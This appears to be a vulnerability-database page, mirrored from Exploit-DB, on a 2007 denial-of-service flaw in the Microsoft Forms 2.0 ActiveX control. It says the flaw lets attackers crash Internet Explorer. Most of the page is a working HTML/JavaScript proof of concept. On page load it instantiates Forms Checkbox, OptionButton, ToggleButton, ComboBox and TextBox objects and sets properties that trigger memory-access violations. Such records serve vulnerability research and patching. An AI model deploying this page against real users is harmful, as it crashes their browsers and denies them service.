Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056343 漏洞类型
发布时间 2007-11-12 更新时间 2007-11-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/30756
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/26414/info

Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.

Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.

Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
      var obj;

      //Forms.Checkbox.1
      obj = new ActiveXObject("Forms.Checkbox.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.OptionButton.1
      obj = new ActiveXObject("Forms.OptionButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.ToggleButton.1
      obj = new ActiveXObject("Forms.ToggleButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

     //Forms.ComboBox.1
     obj = new ActiveXObject("Forms.ComboBox.1");
     obj.Text = "A";
     obj.Value = "A";
    

     //Forms.TextBox.1
     obj = new ActiveXObject("Forms.Textbox.1");
     obj.Text = "A";
     obj.Value = "A";
     obj.SelStart = 1;
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();" />
</html>